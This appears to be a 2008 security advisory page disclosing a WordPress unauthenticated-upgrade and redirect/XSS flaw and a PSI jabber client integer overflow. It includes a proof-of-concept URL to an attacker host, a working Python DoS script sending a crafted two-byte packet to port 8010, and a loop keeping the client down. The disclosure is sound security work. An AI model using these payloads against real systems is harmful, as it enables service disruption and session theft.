Advisories 2008

2008-001: Wordpress is vulnerable to an unauthorized upgrade and XSS.
2008-004: PSI remote integer overflow DoS.

2008-001: Wordpress is vulnerable to an unauthorized upgrade and XSS

Original release date: January 3rd, 2008
Last revised: December 22nd, 2008
Discovered by: Jesús Olmos González
Severity: 2/5

VULNERABILITY

BACKGROUND

WordPress started in 2003 with a single bit of code to enhance the typography of everyday writing and with fewer users than you can count on your fingers and toes. Since then it has grown to be the largest self-hosted blogging tool in the world, used on hundreds of thousands of sites and seen by tens of millions of people every day. With a very active development and evolution.

DESCRIPTION

If the WordPress is not the last version, anybody can upgrades the aplication using wp-admin/upgrade.php

The snippet of vulnerable code:
if (isset($_GET['step']))
$step = (int) $_GET['step'];
...
switch($step) :
case 0:
$goback = clean_url(stripslashes(wp_get_referer()));
...
case 1:
wp_upgrade();
if ( empty( $_GET['backto'] ) )
$backto = __get_option('home') . '/';
...

If step is set to one, the link "Have fun" is set to the backto parameter value, then is possible to make a Cross Site Attack to steal user sessions.

PROOF OF CONCEPT

http://www.victim.com/wp-admin/upgrade.php
http://www.victim.com/wp-admin/upgrade.php?step=1&backto=http://www.The-attacker.org

BUSINESS IMPACT

If the upgrade fails, the availibility of the wordpress could be affected. If the cross site attack succeeds, the confidentiality and integrity of the content will be afected.

SYSTEMS AFFECTED

All versions of wordpress are affected.

SOLUTION

Wordpress considered was not as serious as it seams. So no patch published for this issue.

REFERENCES

http://www.wordpress.org

CREDITS

This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

December 21, 2007: Initial release.
January 7, 2008: More details added.

DISCLOSURE TIMELINE

December 21, 2007: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
January 6, 2008: WordPress security contacted.
January 11, 2008: WordPress security confirms they consider the vulnerability as low impact.
December 22, 2008: Published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2008-004: PSI remote integer overflow DoS

Original release date: 12th December, 2008
Last revised: 22nd December, 2008
Discovered by: Jesús Olmos González
Severity: 4/5

BACKGROUND

PSI is a widely used jabber client Qt4 based, available for Windows, Mac, linux, and other operative systems.

DESCRIPTION

In order doing file transfers, a open port is needed (by default is 8010/tcp).

If first byte of data stream is a 0x05, it means socks5 option and we enter in the vulnerable zone of the code.

Is possible to satisfy the jump: cmp al, 5  -> je vulnCheck()

The second byte is the amount of bytes to memcpy, but there is a check:

cmp ecx, 10 -> jg goHome()

Well the signed comparison lets us to send negative values, the acepted range are <= 10 and > 0x7f (it shoud be compared as unsigned) then the check can be bypased with this int overflow, now we can play with 0x80 - 0xff range, and the rest of the stream.

By now we pass successfully the QByteArray.Resize() and QByteArray.Realloc()

And arrive to the memcpy, from all the data stream sended, n bytes will be copied, n is controlled by us :)
The problem to make a heap overflow, is that the destiny variable will be resized to n. Then is possible to hangup the process or also the system with these two ways:

1. Can send a only two bytes buffer \x05\xff then the memcpy's rep movz will access to non paged source, becouse we don't sent the bytes we are saying to copy.
2. Can be sended a very large buffer and firce a large copy of memory. The system can be saturated.

PROOF OF CONCEPT

#!/usr/bin/python
#by sha0 remote integer overflow DoS (Linux && windows)
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close()
#eof

The process can be crashed remotelly by:
./PSIcoKiller.py <ip>

PSI down forever:
while [ 1 ]; do ./PSIcoKiller.py <ip> ;done

BUSINESS IMPACT

Remote/local Denial of Service of the communications.

SYSTEMS AFFECTED

PSI 0.11, 0.12 and 0.13 (last)
PSI 0.10 not affected
PSI 0.12.1 Solves the problem

Tested in Linux and Windows, but may crash other heap implementations.

SOLUTION

PSI 0.12.1 solves the problem, nevertheless i suggest filter this port whenever possible.
Thanks to kev and infinity for their quick response.

REFERENCES

http://psi-im.org

CREDITS

This vulnerability has been discovered and reported by Jesús Olmos González (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

December 12, 2008: Initial release
December 17, 2008: update the new that 0.12.1 solves the problem.

DISCLOSURE TIMELINE

November 20, 2008: Vulnerability acquired by Internet Security Auditors
December 02, 2008: Vendor notification
December 12, 2008: Advisory documentation
December 18, 2008: Vendor Release 0.12.1
December 23, 2008: Published

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.